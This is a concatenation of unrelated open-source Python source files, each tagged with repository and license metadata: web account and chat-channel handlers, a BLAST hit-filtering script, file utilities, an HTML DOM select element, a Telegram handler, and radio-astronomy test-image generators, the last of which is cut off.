forms.ContactForm(self) class SecureRequestHandler(BaseHandler): """ Only accessible to users that are logged in """ @user_required def get(self, **kwargs): user_session = self.user user_session_object = self.auth.store.get_session(self.request) user_info = self.user_model.get_by_id(long(self.user_id)) user_info_object = self.auth.store.user_model.get_by_auth_token( user_session['user_id'], user_session['token']) try: params = { "user_session": user_session, "user_session_object": user_session_object, "user_info": user_info, "user_info_object": user_info_object, "userinfo_logout-url": self.auth_config['logout_url'], } return self.render_template('secure_zone.html', **params) except (AttributeError, KeyError), e: return "Secure zone error:" + " %s." % e class DeleteAccountHandler(BaseHandler): @user_required def get(self, **kwargs): chtml = captcha.displayhtml( public_key=self.app.config.get('captcha_public_key'), use_ssl=(self.request.scheme == 'https'), error=None) if self.app.config.get('captcha_public_key') == "PUT_YOUR_RECAPCHA_PUBLIC_KEY_HERE" or \ self.app.config.get('captcha_private_key') == "PUT_YOUR_RECAPCHA_PUBLIC_KEY_HERE": chtml = '<div class="alert alert-error"><strong>Error</strong>: You have to ' \ '<a href="http://www.google.com/recaptcha/whyrecaptcha" target="_blank">sign up ' \ 'for API keys</a> in order to use reCAPTCHA.</div>' \ '<input type="hidden" name="recaptcha_challenge_field" value="manual_challenge" />' \ '<input type="hidden" name="recaptcha_response_field" value="manual_challenge" />' params = { 'captchahtml': chtml, } return self.render_template('delete_account.html', **params) def post(self, **kwargs): challenge = self.request.POST.get('recaptcha_challenge_field') response = self.request.POST.get('recaptcha_response_field') remote_ip = self.request.remote_addr cResponse = captcha.submit( challenge, response, self.app.config.get('captcha_private_key'), remote_ip) if cResponse.is_valid: # captcha was valid... carry on..nothing to see here pass else: _message = _('Wrong image verification code. Please try again.') self.add_message(_message, 'error') return self.redirect_to('delete-account') if not self.form.validate() and False: return self.get() password = self.form.password.data.strip() try: user_info = self.user_model.get_by_id(long(self.user_id)) auth_id = "own:%s" % user_info.username password = utils.hashing(password, self.app.config.get('salt')) try: # authenticate user by its password user = self.user_model.get_by_auth_password(auth_id, password) if user: # Delete Social Login for social in models_boilerplate.SocialUser.get_by_user(user_info.key): social.key.delete() user_info.key.delete() ndb.Key("Unique", "User.username:%s" % user.username).delete_async() ndb.Key("Unique", "User.auth_id:own:%s" % user.username).delete_async() ndb.Key("Unique", "User.email:%s" % user.email).delete_async() #TODO: Delete UserToken objects self.auth.unset_session() # display successful message msg = _("The account has been successfully deleted.") self.add_message(msg, 'success') return self.redirect_to('home') except (InvalidAuthIdError, InvalidPasswordError), e: # Returns error message to self.response.write in # the BaseHandler.dispatcher message = _("Incorrect password! Please enter your current password to change your account settings.") self.add_message(message, 'error') return self.redirect_to('delete-account') except (AttributeError, TypeError), e: login_error_message = _('Your session has expired.') self.add_message(login_error_message, 'error') self.redirect_to('login') @webapp2.cached_property def form(self): return forms.DeleteAccountForm(self) class ChannelConnected(BaseHandler): def post(self,**kwargs): logger.warn("connected") from_person = self.request.get('from') (person,room)= from_person.split("_") memcache_key=room people=memcache.get(memcache_key) if people: people.append(person) memcache.set(room,people,3600) else: memcache.set(room,[person],3600) class ChannelDisconnected(BaseHandler): def post(self,**kwargs): logger.warn("disconnected") from_person = self.request.get('from') (person,room)= from_person.split("_") memcache_key=room people=memcache.get(memcache_key) if people: try: people.remove(person) memcache.set(room,people,3600) except: pass else: memcache.set(room,[],3600) class TestAngular(BaseHandler): def get(self,**kwargs): params = { 'me' : "%d"%random.randint(1,10000), 'game_key' : "todo" } token = channel.create_channel('%s_%s'%(params['me'],params['game_key'])) params['token'] = token return self.render_template('index.html', **params)
krismcfarlin/todo_angular_endpoints_sockets
bp_content/themes/default/handlers/handlers.py
Python
lgpl-3.0
10,823
0.00462
#!/usr/bin/python from multiprocessing import Pool import time import os import sys import argparse from homolog4 import * from collections import defaultdict # Copyright(C) 2014 David Ream # Released under Biopython license. http://www.biopython.org/DIST/LICENSE # Do not remove this comment # This exists to make the main function easier to read. It contains code to run the argument parser, and does nothing else. def parser_code(): parser = argparse.ArgumentParser(description="Filter out redundant hits, by loci, from the initial BLAST parse and remove organisms that lack neighborhoods.") parser.add_argument("-i", "--infolder", dest="infolder", default='./blast_parse_raw_operon/', metavar="FOLDER", help="A folder that contains the initial parse of the BLAST hits. This program assumes that no loci filtering or organism removal has been done yet.") parser.add_argument("-o", "--outfolder", dest="outfolder", metavar="FOLDER", default='./blast_parse/', help="Folder where the BLAST results will be stored. Default is the folder './blast_result/'.") parser.add_argument("-q", "--operon_query", dest="operon_query", default='./regulonDB/operon_names_and_genes.txt', metavar="FILE", help="A file that contains the names and genes comprising the operons that are under investigation.") parser.add_argument("-r", "--reference", dest="reference", default='NC_000913', metavar="STRING", help="An accession number of the reference organism.") parser.add_argument("-f", "--filter", dest="filter", default='', metavar="FILE", help="A file that contains the accession numbers of the organisms that are under investigation.") parser.add_argument("-n", "--num_proc", dest="num_proc", metavar="INT", default = os.sysconf("SC_NPROCESSORS_CONF"), type=int, help="Number of processors that you want this script to run on. The default is every CPU that the system has.") parser.add_argument("-g", "--max_gap", dest="max_intergenic_gap", metavar="INT", default = 500, type=int, help="Length of the largest allowable intergenic gap allowed in determining a gene neighborhood. Default is 500 nucleotides") return parser.parse_args() def check_options(parsed_args): if os.path.isdir(parsed_args.infolder): infolder = parsed_args.infolder else: print "The folder %s does not exist." % parsed_args.infolder sys.exit() # if the directory that the user specifies does not exist, then the program makes it for them. if not os.path.isdir(parsed_args.outfolder): os.makedirs(parsed_args.outfolder) outfolder = parsed_args.outfolder if outfolder[-1] != '/': outfolder = outfolder + '/' if os.path.exists(parsed_args.operon_query): operon_query = parsed_args.operon_query else: print "The file %s does not exist." % parsed_args.operon_query sys.exit() if os.path.exists(parsed_args.filter): filter_file = parsed_args.filter elif parsed_args.filter == '': filter_file = parsed_args.filter else: print "The file %s does not exist." % parsed_args.filter sys.exit() if os.path.exists(parsed_args.operon_query): filter_file = parsed_args.operon_query else: print "The file %s does not exist." % parsed_args.operon_query sys.exit() # section of code that deals determining the number of CPU cores that will be used by the program if parsed_args.num_proc > os.sysconf("SC_NPROCESSORS_CONF"): num_proc = os.sysconf("SC_NPROCESSORS_CONF") elif parsed_args.num_proc < 1: num_proc = 1 else: num_proc = int(parsed_args.num_proc) if parsed_args.num_proc < 1: max_intergenic_gap = 1 else: max_intergenic_gap = int(parsed_args.max_intergenic_gap) return infolder, outfolder, operon_query, filter_file, num_proc, operon_query, max_intergenic_gap #this function will return all of the files that are in a directory. os.walk is recursive traversal. def returnRecursiveDirFiles(root_dir): result = [] for path, dir_name, flist in os.walk(root_dir): for f in flist: fname = os.path.join(path, f) if os.path.isfile(fname): result.append(fname) return result # this function will return a dictionary of operon keyed off the operon name with data values in the form # of a list of homologs which are homologous. ex. [abcA, abcB] def return_self_homolog_dict(operon_list = 'operon_name_and_genes.txt', prot_file = 'operon_protein_query.fa', rna_file = 'operon_rna_query.fa'): # makes a dictionary keyed by operon name and a list of the gene contained by the operon operon_dict = {} for line in [i.strip() for i in open(operon_list).readlines()]: tmp = line.split('\t') operon_dict.update({tmp[0]:tmp[1:]}) # set up databases for the different types of genes # for proteins -p must be set to true cmd = "formatdb -i %s -p T -o F" % (prot_file) os.system(cmd) # for RNA genes -p must be set to false #cmd = "formatdb -i %s -p F -o F" % (rna_file) #os.system(cmd) # blast each set of genes against itself '''cmd = "blastall -p blastp -a %i -i %s -d %s -e %s -o %s -m 9" % (os.sysconf("SC_NPROCESSORS_ONLN"), prot_file, prot_file, '1e-10', 'self_prot.txt') os.system( cmd )''' cmd = "blastall -p blastp -a %i -i %s -d %s -e %s -o %s -m 8" % (os.sysconf("SC_NPROCESSORS_ONLN"), prot_file, prot_file, '1e-10', 'self_prot.txt') os.system( cmd ) #cmd = "blastall -p blastn -a %i -i %s -d %s -e %s -o %s -m 9" % (os.sysconf("SC_NPROCESSORS_ONLN"), rna_file, rna_file, '1e-10', 'self_rna.txt') #os.system( cmd ) # in this next section i will read in the resulting blast results, and construct a dictionary which will be keyed off gene name and provide a list # of homologs from the operon set. This list will allow the program to filter out spurious results. We will miss fusions of homologous genes, but # hopefully this will be a rare event in our dataset, untill this can be revised lst = [i.strip() for i in open('self_prot.txt').readlines() if i[0] != '#'] #for line in [i.strip() for i in open('self_rna.txt').readlines() if i[0] != '#']: # lst.append(line) result = {} print "got here 1" for line in lst: source, hit = line.split('\t')[0:2] source_annotation = source.split('|')[2] hit_annotation = hit.split('|')[2] # we have two genes in the test set that are homologous if source_annotation != hit_annotation: if source_annotation not in result.keys(): result.update({source_annotation: [hit_annotation]}) else: result[source_annotation].append(hit_annotation) print "got here 2" return result # The purpose of this function is to filter out the spurious hits on a locus, and determine the annotation of the gene at # that position. To do this the program will make a dict of each [locus/start] ? and then determine the annotations that # exist for it. If there are two annotations that have homologous genes then the best hit will be used. if there are two # annotations for a locus which are not homologous then some sort of hit analysis will be performed to determine is there # is a good candidate for a gene fusion. (should look at papers on this). When done the function will report a list of # homologs that are ordered by start position whichi have been filtered for the best hit, or as a fusion. def filter_locus_hits(h_list, self_homolog_dict): pass def main(): start = time.time() print time.time() - start # ./blast_parse.py -f phylo_order.txt if __name__ == '__main__': main()
reamdc1/gene_block_evolution_old
loci_filtering.py
Python
gpl-3.0
8,117
0.014291
from modularodm.exceptions import ValidationValueError def copy_files(src, target_node, parent=None, name=None): """Copy the files from src to the target node :param Folder src: The source to copy children from :param Node target_node: The node settings of the project to copy files to :param Folder parent: The parent of to attach the clone of src to, if applicable """ assert not parent or not parent.is_file, 'Parent must be a folder' cloned = src.clone().wrapped() cloned.parent = parent cloned.node = target_node cloned.name = name or cloned.name if src.is_file: cloned.versions = src.versions cloned.save() if not src.is_file: for child in src.children: copy_files(child, target_node, parent=cloned) return cloned class GenWrapper(object): """A Wrapper for MongoQuerySets Overrides __iter__ so for loops will always return wrapped objects. All other methods are proxied to the underlying QuerySet """ def __init__(self, mqs): self.mqs = mqs def __iter__(self): """Returns a generator that wraps all StoredFileNodes returned from self.mqs """ return (x.wrapped() for x in self.mqs) def __repr__(self): return '<website.files.utils.GenWrapper({!r})>'.format(self.mqs) def __getitem__(self, x): """__getitem__ does not default to __getattr__ so it must be explicitly overriden """ return self.mqs[x].wrapped() def __len__(self): """__len__ does not default to __getattr__ so it must be explicitly overriden """ return len(self.mqs) def __getattr__(self, name): if 'mqs' in self.__dict__: try: return getattr(self.mqs, name) except AttributeError: pass # Avoids error message about the underlying object return object.__getattribute__(self, name) def validate_location(value): if value is None: return # Allow for None locations but not broken dicts from website.addons.osfstorage import settings for key in ('service', settings.WATERBUTLER_RESOURCE, 'object'): if key not in value: raise ValidationValueError('Location {} missing key "{}"'.format(value, key)) def insort(col, element, get=lambda x: x): """Python's bisect does not allow for a get/key so it can not be used on a list of dictionaries. Inserts element into the sorted collection col via a binary search. if element is not directly compairable the kwarg get may be a callable that transforms element into a compairable object. ie: A lambda that returns a certain key of a dict or attribute of an object :param list col: The collection to insort into :param ? element: The Element to be insortted into col :param callable get: A callable that take a type of element and returns a compairable """ if not col: # If collection is empty go ahead and insert at the first position col.insert(0, element) return col lo, hi = 0, len(col) # Binary search for the correct position while lo < hi: mid = int((hi + lo) / 2) if get(col[mid]) > get(element): hi = mid else: lo = mid + 1 col.insert(lo, element) return col
arpitar/osf.io
website/files/utils.py
Python
apache-2.0
3,388
0.000885
######################################################################## # # File Name: HTMLSelectElement.py # # """ WWW: http://4suite.com/4DOM e-mail: support@4suite.com Copyright (c) 2000 Fourthought Inc, USA. All Rights Reserved. See http://4suite.com/COPYRIGHT for license and copyright information """ from xml.dom import implementation from xml.dom import IndexSizeErr from xml.dom.html.HTMLElement import HTMLElement import string class HTMLSelectElement(HTMLElement): def __init__(self, ownerDocument, nodeName='SELECT'): HTMLElement.__init__(self, ownerDocument, nodeName) def _get_type(self): if self._get_multiple(): return 'select-multiple' return 'select-one' def _get_selectedIndex(self): options = self._get_options() for ctr in range(len(options)): node = options.item(ctr) if node._get_selected() == 1: return ctr return -1 def _set_selectedIndex(self,index): options = self._get_options() if index < 0 or index >= len(options): raise IndexSizeErr() for ctr in range(len(options)): node = options.item(ctr) if ctr == index: node._set_selected(1) else: node._set_selected(0) def _get_value(self): options = self._get_options() node = options.item(self._get_selectedIndex()) if node.hasAttribute('VALUE'): value = node.getAttribute('VALUE') elif node.firstChild: value = node.firstChild.data else: value = '' return value def _set_value(self,value): # This doesn't seem to do anything in browsers pass def _get_length(self): return self._get_options()._get_length() def _get_options(self): children = self.getElementsByTagName('OPTION') return implementation._4dom_createHTMLCollection(children) def _get_disabled(self): if self.getAttributeNode('DISABLED'): return 1 return 0 def _set_disabled(self,disabled): if disabled: self.setAttribute('DISABLED', 'DISABLED') else: self.removeAttribute('DISABLED') def _get_multiple(self): if self.getAttributeNode('MULTIPLE'): return 1 return 0 def _set_multiple(self,mult): if mult: self.setAttribute('MULTIPLE', 'MULTIPLE') else: self.removeAttribute('MULTIPLE') def _get_name(self): return self.getAttribute('NAME') def _set_name(self,name): self.setAttribute('NAME',name) def _get_size(self): rt = self.getAttribute('SIZE') if rt != None: return string.atoi(rt) return -1 def _set_size(self,size): self.setAttribute('SIZE',str(size)) def _get_tabIndex(self): return string.atoi(self.getAttribute('TABINDEX')) def _set_tabIndex(self,tabindex): self.setAttribute('TABINDEX',str(tabindex)) def add(self,newElement,beforeElement): self.insertBefore(newElement,beforeElement) def remove(self,index): if index < 0 or index >= self._get_length: return hc = self._get_options() node = hc.item(index) self.removeChild(node) def _get_form(self): parent = self.parentNode while parent: if parent.nodeName == "FORM": return parent parent = parent.parentNode return None ### Attribute Access Mappings ### _readComputedAttrs = HTMLElement._readComputedAttrs.copy() _readComputedAttrs.update ({ 'type' : _get_type, 'length' : _get_length, 'options' : _get_options, 'form' : _get_form, 'selectedIndex' : _get_selectedIndex, 'value' : _get_value, 'disabled' : _get_disabled, 'multiple' : _get_multiple, 'name' : _get_name, 'size' : _get_size, 'tabIndex' : _get_tabIndex, }) _writeComputedAttrs = HTMLElement._writeComputedAttrs.copy() _writeComputedAttrs.update ({ 'selectedIndex' : _set_selectedIndex, 'value' : _set_value, 'disabled' : _set_disabled, 'multiple' : _set_multiple, 'name' : _set_name, 'size' : _set_size, 'tabIndex' : _set_tabIndex, }) _readOnlyAttrs = filter(lambda k,m=_writeComputedAttrs: not m.has_key(k), HTMLElement._readOnlyAttrs + _readComputedAttrs.keys())
alanjw/GreenOpenERP-Win-X86
python/Lib/site-packages/_xmlplus/dom/html/HTMLSelectElement.py
Python
agpl-3.0
4,750
0.008421
from telegram.handlers.base import BasePlatformHandler class DummyHandler(BasePlatformHandler): def handle(self): print 'Channel: %s' % self.telegram.channel.name print 'Subject: %s' % self.telegram.subject print 'Message: %s' % self.telegram.content print 'Level: %s' % self.subscription.get_level_display() print 'Extra: %s' % self.extra
aquametalabs/django-telegram
telegram/handlers/dummy.py
Python
bsd-3-clause
387
0
""" Functions that aid testing in various ways. A typical use would be:: lowcore = create_named_configuration('LOWBD2-CORE') times = numpy.linspace(-3, +3, 13) * (numpy.pi / 12.0) frequency = numpy.array([1e8]) channel_bandwidth = numpy.array([1e7]) # Define the component and give it some polarisation and spectral behaviour f = numpy.array([100.0]) flux = numpy.array([f]) phasecentre = SkyCoord(ra=+15.0 * u.deg, dec=-35.0 * u.deg, frame='icrs', equinox='J2000') compabsdirection = SkyCoord(ra=17.0 * u.deg, dec=-36.5 * u.deg, frame='icrs', equinox='J2000') comp = create_skycomponent(flux=flux, frequency=frequency, direction=compabsdirection, polarisation_frame=PolarisationFrame('stokesI')) image = create_test_image(frequency=frequency, phasecentre=phasecentre, cellsize=0.001, polarisation_frame=PolarisationFrame('stokesI') vis = create_visibility(lowcore, times=times, frequency=frequency, channel_bandwidth=channel_bandwidth, phasecentre=phasecentre, weight=1, polarisation_frame=PolarisationFrame('stokesI'), integration_time=1.0) """ import csv import logging from typing import List import astropy.units as u import numpy from astropy.coordinates import SkyCoord from astropy.io import fits from astropy.wcs import WCS from astropy.wcs.utils import pixel_to_skycoord from scipy import interpolate from data_models.memory_data_models import Configuration, Image, GainTable, Skycomponent, SkyModel, PointingTable from data_models.parameters import arl_path from data_models.polarisation import PolarisationFrame from processing_components.calibration.calibration_control import create_calibration_controls from processing_components.calibration.operations import create_gaintable_from_blockvisibility, apply_gaintable from processing_components.image.operations import import_image_from_fits from processing_components.imaging.base import predict_2d, predict_skycomponent_visibility, \ create_image_from_visibility, advise_wide_field from processing_components.imaging.primary_beams import create_pb from processing_components.skycomponent.operations import create_skycomponent, insert_skycomponent, \ apply_beam_to_skycomponent, filter_skycomponents_by_flux from processing_components.visibility.base import create_blockvisibility, create_visibility from processing_components.visibility.coalesce import convert_blockvisibility_to_visibility, \ convert_visibility_to_blockvisibility from processing_library.image.operations import create_image_from_array log = logging.getLogger(__name__) def create_test_image(canonical=True, cellsize=None, frequency=None, channel_bandwidth=None, phasecentre=None, polarisation_frame=PolarisationFrame("stokesI")) -> Image: """Create a useful test image This is the test image M31 widely used in ALMA and other simulations. It is actually part of an Halpha region in M31. :param canonical: Make the image into a 4 dimensional image :param cellsize: :param frequency: Frequency (array) in Hz :param channel_bandwidth: Channel bandwidth (array) in Hz :param phasecentre: Phase centre of image (SkyCoord) :param polarisation_frame: Polarisation frame :return: Image """ if frequency is None: frequency = [1e8] im = import_image_from_fits(arl_path("data/models/M31.MOD")) if canonical: if polarisation_frame is None: im.polarisation_frame = PolarisationFrame("stokesI") elif isinstance(polarisation_frame, PolarisationFrame): im.polarisation_frame = polarisation_frame else: raise ValueError("polarisation_frame is not valid") im = replicate_image(im, frequency=frequency, polarisation_frame=im.polarisation_frame) if cellsize is not None: im.wcs.wcs.cdelt[0] = -180.0 * cellsize / numpy.pi im.wcs.wcs.cdelt[1] = +180.0 * cellsize / numpy.pi if frequency is not None: im.wcs.wcs.crval[3] = frequency[0] if channel_bandwidth is not None: im.wcs.wcs.cdelt[3] = channel_bandwidth[0] else: if len(frequency) > 1: im.wcs.wcs.cdelt[3] = frequency[1] - frequency[0] else: im.wcs.wcs.cdelt[3] = 0.001 * frequency[0] im.wcs.wcs.radesys = 'ICRS' im.wcs.wcs.equinox = 2000.00 if phasecentre is not None: im.wcs.wcs.crval[0] = phasecentre.ra.deg im.wcs.wcs.crval[1] = phasecentre.dec.deg # WCS is 1 relative im.wcs.wcs.crpix[0] = im.data.shape[3] // 2 + 1 im.wcs.wcs.crpix[1] = im.data.shape[2] // 2 + 1 return im def create_test_image_from_s3(npixel=16384, polarisation_frame=PolarisationFrame("stokesI"), cellsize=0.000015, frequency=numpy.array([1e8]), channel_bandwidth=numpy.array([1e6]), phasecentre=None, fov=20, flux_limit=1e-3) -> Image: """Create MID test image from S3 The input catalog was generated at http://s-cubed.physics.ox.ac.uk/s3_sex using the following query:: Database: s3_sex SQL: select * from Galaxies where (pow(10,itot_151)*1000 > 1.0) and (right_ascension between -5 and 5) and (declination between -5 and 5);; Number of rows returned: 29966 For frequencies < 610MHz, there are three tables to use:: data/models/S3_151MHz_10deg.csv, use fov=10 data/models/S3_151MHz_20deg.csv, use fov=20 data/models/S3_151MHz_40deg.csv, use fov=40 For frequencies > 610MHz, there are three tables: data/models/S3_1400MHz_1mJy_10deg.csv, use flux_limit>= 1e-3 data/models/S3_1400MHz_100uJy_10deg.csv, use flux_limit < 1e-3 data/models/S3_1400MHz_1mJy_18deg.csv, use flux_limit>= 1e-3 data/models/S3_1400MHz_100uJy_18deg.csv, use flux_limit < 1e-3 The component spectral index is calculated from the 610MHz and 151MHz or 1400MHz and 610MHz, and then calculated for the specified frequencies. If polarisation_frame is not stokesI then the image will a polarised axis but the values will be zero. :param npixel: Number of pixels :param polarisation_frame: Polarisation frame (default PolarisationFrame("stokesI")) :param cellsize: cellsize in radians :param frequency: :param channel_bandwidth: Channel width (Hz) :param phasecentre: phasecentre (SkyCoord) :param fov: fov 10 | 20 | 40 :param flux_limit: Minimum flux (Jy) :return: Image """ ras = [] decs = [] fluxes = [] if phasecentre is None: phasecentre = SkyCoord(ra=+180.0 * u.deg, dec=-60.0 * u.deg, frame='icrs', equinox='J2000') if polarisation_frame is None: polarisation_frame = PolarisationFrame("stokesI") npol = polarisation_frame.npol nchan = len(frequency) shape = [nchan, npol, npixel, npixel] w = WCS(naxis=4) # The negation in the longitude is needed by definition of RA, DEC w.wcs.cdelt = [-cellsize * 180.0 / numpy.pi, cellsize * 180.0 / numpy.pi, 1.0, channel_bandwidth[0]] w.wcs.crpix = [npixel // 2 + 1, npixel // 2 + 1, 1.0, 1.0] w.wcs.ctype = ["RA---SIN", "DEC--SIN", 'STOKES', 'FREQ'] w.wcs.crval = [phasecentre.ra.deg, phasecentre.dec.deg, 1.0, frequency[0]] w.naxis = 4 w.wcs.radesys = 'ICRS' w.wcs.equinox = 2000.0 model = create_image_from_array(numpy.zeros(shape), w, polarisation_frame=polarisation_frame) if numpy.max(frequency) > 6.1E8: if fov > 10: fovstr = '18' else: fovstr = '10' if flux_limit >= 1e-3: csvfilename = arl_path('data/models/S3_1400MHz_1mJy_%sdeg.csv' % fovstr) else: csvfilename = arl_path('data/models/S3_1400MHz_100uJy_%sdeg.csv' % fovstr) log.info('create_test_image_from_s3: Reading S3 sources from %s ' % csvfilename) else: assert fov in [10, 20, 40], "Field of view invalid: use one of %s" % ([10, 20, 40]) csvfilename = arl_path('data/models/S3_151MHz_%ddeg.csv' % (fov)) log.info('create_test_image_from_s3: Reading S3 sources from %s ' % csvfilename) with open(csvfilename) as csvfile: readCSV = csv.reader(csvfile, delimiter=',') r = 0 for row in readCSV: # Skip first row if r > 0: ra = float(row[4]) + phasecentre.ra.deg dec = float(row[5]) + phasecentre.dec.deg if numpy.max(frequency) > 6.1E8: alpha = (float(row[11]) - float(row[10])) / numpy.log10(1400.0 / 610.0) flux = numpy.power(10, float(row[10])) * numpy.power(frequency / 1.4e9, alpha) else: alpha = (float(row[10]) - float(row[9])) / numpy.log10(610.0 / 151.0) flux = numpy.power(10, float(row[9])) * numpy.power(frequency / 1.51e8, alpha) if numpy.max(flux) > flux_limit: ras.append(ra) decs.append(dec) fluxes.append(flux) r += 1 csvfile.close() assert len(fluxes) > 0, "No sources found above flux limit %s" % flux_limit log.info('create_test_image_from_s3: %d sources read' % (len(fluxes))) p = w.sub(2).wcs_world2pix(numpy.array(ras), numpy.array(decs), 1) total_flux = numpy.sum(fluxes) fluxes = numpy.array(fluxes) ip = numpy.round(p).astype('int') ok = numpy.where((0 <= ip[0, :]) & (npixel > ip[0, :]) & (0 <= ip[1, :]) & (npixel > ip[1, :]))[0] ps = ip[:, ok] fluxes = fluxes[ok] actual_flux = numpy.sum(fluxes) log.info('create_test_image_from_s3: %d sources inside the image' % (ps.shape[1])) log.info('create_test_image_from_s3: average channel flux in S3 model = %.3f, actual average channel flux in ' 'image = %.3f' % (total_flux / float(nchan), actual_flux / float(nchan))) for chan in range(nchan): for iflux, flux in enumerate(fluxes): model.data[chan, 0, ps[1, iflux], ps[0, iflux]] = flux[chan] return model def create_test_skycomponents_from_s3(polarisation_frame=PolarisationFrame("stokesI"), frequency=numpy.array([1e8]), channel_bandwidth=numpy.array([1e6]), phasecentre=None, fov=20, flux_limit=1e-3, radius=None): """Create test image from S3 The input catalog was generated at http://s-cubed.physics.ox.ac.uk/s3_sex using the following query:: Database: s3_sex SQL: select * from Galaxies where (pow(10,itot_151)*1000 > 1.0) and (right_ascension between -5 and 5) and (declination between -5 and 5);; Number of rows returned: 29966 For frequencies < 610MHz, there are three tables to use:: data/models/S3_151MHz_10deg.csv, use fov=10 data/models/S3_151MHz_20deg.csv, use fov=20 data/models/S3_151MHz_40deg.csv, use fov=40 For frequencies > 610MHz, there are three tables: data/models/S3_1400MHz_1mJy_10deg.csv, use flux_limit>= 1e-3 data/models/S3_1400MHz_100uJy_10deg.csv, use flux_limit < 1e-3 data/models/S3_1400MHz_1mJy_18deg.csv, use flux_limit>= 1e-3 data/models/S3_1400MHz_100uJy_18deg.csv, use flux_limit < 1e-3 The component spectral index is calculated from the 610MHz and 151MHz or 1400MHz and 610MHz, and then calculated for the specified frequencies. If polarisation_frame is not stokesI then the image will a polarised axis but the values will be zero. :param npixel: Number of pixels :param polarisation_frame: Polarisation frame (default PolarisationFrame("stokesI")) :param cellsize: cellsize in radians :param frequency: :param channel_bandwidth: Channel width (Hz) :param phasecentre: phasecentre (SkyCoord) :param fov: fov 10 | 20 | 40 :param flux_limit: Minimum flux (Jy) :return: Image """ ras = [] decs = [] fluxes = [] names = [] if phasecentre is None: phasecentre = SkyCoord(ra=+180.0 * u.deg, dec=-60.0 * u.deg, frame='icrs', equinox='J2000') if polarisation_frame is None: polarisation_frame = PolarisationFrame("stokesI") if numpy.max(frequency) > 6.1E8: if fov > 10: fovstr = '18' else: fovstr = '10' if flux_limit >= 1e-3: csvfilename = arl_path('data/models/S3_1400MHz_1mJy_%sdeg.csv' % fovstr) else: csvfilename = arl_path('data/models/S3_1400MHz_100uJy_%sdeg.csv' % fovstr) log.info('create_test_skycomponents_from_s3: Reading S3-SEX sources from %s ' % csvfilename) else: assert fov in [10, 20, 40], "Field of view invalid: use one of %s" % ([10, 20, 40]) csvfilename = arl_path('data/models/S3_151MHz_%ddeg.csv' % (fov)) log.info('create_test_skycomponents_from_s3: Reading S3-SEX sources from %s ' % csvfilename) skycomps = list() with open(csvfilename) as csvfile: readCSV = csv.reader(csvfile, delimiter=',') r = 0 for row in readCSV: # Skip first row if r > 0: ra = float(row[4])/numpy.cos(phasecentre.dec.rad) + phasecentre.ra.deg dec = float(row[5]) + phasecentre.dec.deg if numpy.max(frequency) > 6.1E8: alpha = (float(row[11]) - float(row[10])) / numpy.log10(1400.0 / 610.0) flux = numpy.power(10, float(row[10])) * numpy.power(frequency / 1.4e9, alpha) else: alpha = (float(row[10]) - float(row[9])) / numpy.log10(610.0 / 151.0) flux = numpy.power(10, float(row[9])) * numpy.power(frequency / 1.51e8, alpha) if numpy.max(flux) > flux_limit: ras.append(ra) decs.append(dec) fluxes.append([[f] for f in flux]) names.append("S3_%s" % row[0]) r += 1 csvfile.close() assert len(fluxes) > 0, "No sources found above flux limit %s" % flux_limit directions = SkyCoord(ra=ras * u.deg, dec=decs * u.deg) if phasecentre is not None: separations = directions.separation(phasecentre).to('rad').value else: separations = numpy.zeros(len(names)) for isource, name in enumerate(names): direction = directions[isource] if separations[isource] < radius: if not numpy.isnan(flux).any(): skycomps.append(Skycomponent(direction=direction, flux=fluxes[isource], frequency=frequency, name=names[isource], shape='Point', polarisation_frame=polarisation_frame)) log.info('create_test_skycomponents_from_s3: %d sources found above fluxlimit inside search radius' % len(skycomps)) return skycomps def create_low_test_image_from_gleam(npixel=512, polarisation_frame=PolarisationFrame("stokesI"), cellsize=0.000015, frequency=numpy.array([1e8]), channel_bandwidth=numpy.array([1e6]), phasecentre=None, kind='cubic', applybeam=False, flux_limit=0.1, flux_max=numpy.inf, flux_min=-numpy.inf, radius=None, insert_method='Nearest') -> Image: """Create LOW test image from the GLEAM survey Stokes I is estimated from a cubic spline fit to the measured fluxes. The polarised flux is always zero. See http://www.mwatelescope.org/science/gleam-survey The catalog is available from Vizier. VIII/100 GaLactic and Extragalactic All-sky MWA survey (Hurley-Walker+, 2016) GaLactic and Extragalactic All-sky Murchison Wide Field Array (GLEAM) survey. I: A low-frequency extragalactic catalogue. Hurley-Walker N., et al., Mon. Not. R. Astron. Soc., 464, 1146-1167 (2017), 2017MNRAS.464.1146H :param npixel: Number of pixels :param polarisation_frame: Polarisation frame (default PolarisationFrame("stokesI")) :param cellsize: cellsize in radians :param frequency: :param channel_bandwidth: Channel width (Hz) :param phasecentre: phasecentre (SkyCoord) :param kind: Kind of interpolation (see scipy.interpolate.interp1d) Default: linear :return: Image """ if phasecentre is None: phasecentre = SkyCoord(ra=+15.0 * u.deg, dec=-35.0 * u.deg, frame='icrs', equinox='J2000') if radius is None: radius = npixel * cellsize / numpy.sqrt(2.0) sc = create_low_test_skycomponents_from_gleam(flux_limit=flux_limit, polarisation_frame=polarisation_frame, frequency=frequency, phasecentre=phasecentre, kind=kind, radius=radius) sc = filter_skycomponents_by_flux(sc, flux_min=flux_min, flux_max=flux_max) if polarisation_frame is None: polarisation_frame = PolarisationFrame("stokesI") npol = polarisation_frame.npol nchan = len(frequency) shape = [nchan, npol, npixel, npixel] w = WCS(naxis=4) # The negation in the longitude is needed by definition of RA, DEC w.wcs.cdelt = [-cellsize * 180.0 / numpy.pi, cellsize * 180.0 / numpy.pi, 1.0, channel_bandwidth[0]] w.wcs.crpix = [npixel // 2 + 1, npixel // 2 + 1, 1.0, 1.0] w.wcs.ctype = ["RA---SIN", "DEC--SIN", 'STOKES', 'FREQ'] w.wcs.crval = [phasecentre.ra.deg, phasecentre.dec.deg, 1.0, frequency[0]] w.naxis = 4 w.wcs.radesys = 'ICRS' w.wcs.equinox = 2000.0 model = create_image_from_array(numpy.zeros(shape), w, polarisation_frame=polarisation_frame) model = insert_skycomponent(model, sc, insert_method=insert_method) if applybeam: beam = create_pb(model, telescope='LOW', use_local=False) model.data[...] *= beam.data[...] return model def create_low_test_skymodel_from_gleam(npixel=512, polarisation_frame=PolarisationFrame("stokesI"), cellsize=0.000015, frequency=numpy.array([1e8]), channel_bandwidth=numpy.array([1e6]), phasecentre=None, kind='cubic', applybeam=True, flux_limit=0.1, flux_max=numpy.inf, flux_threshold=1.0, insert_method='Nearest', telescope='LOW') -> SkyModel: """Create LOW test skymodel from the GLEAM survey Stokes I is estimated from a cubic spline fit to the measured fluxes. The polarised flux is always zero. See http://www.mwatelescope.org/science/gleam-survey The catalog is available from Vizier. VIII/100 GaLactic and Extragalactic All-sky MWA survey (Hurley-Walker+, 2016) GaLactic and Extragalactic All-sky Murchison Wide Field Array 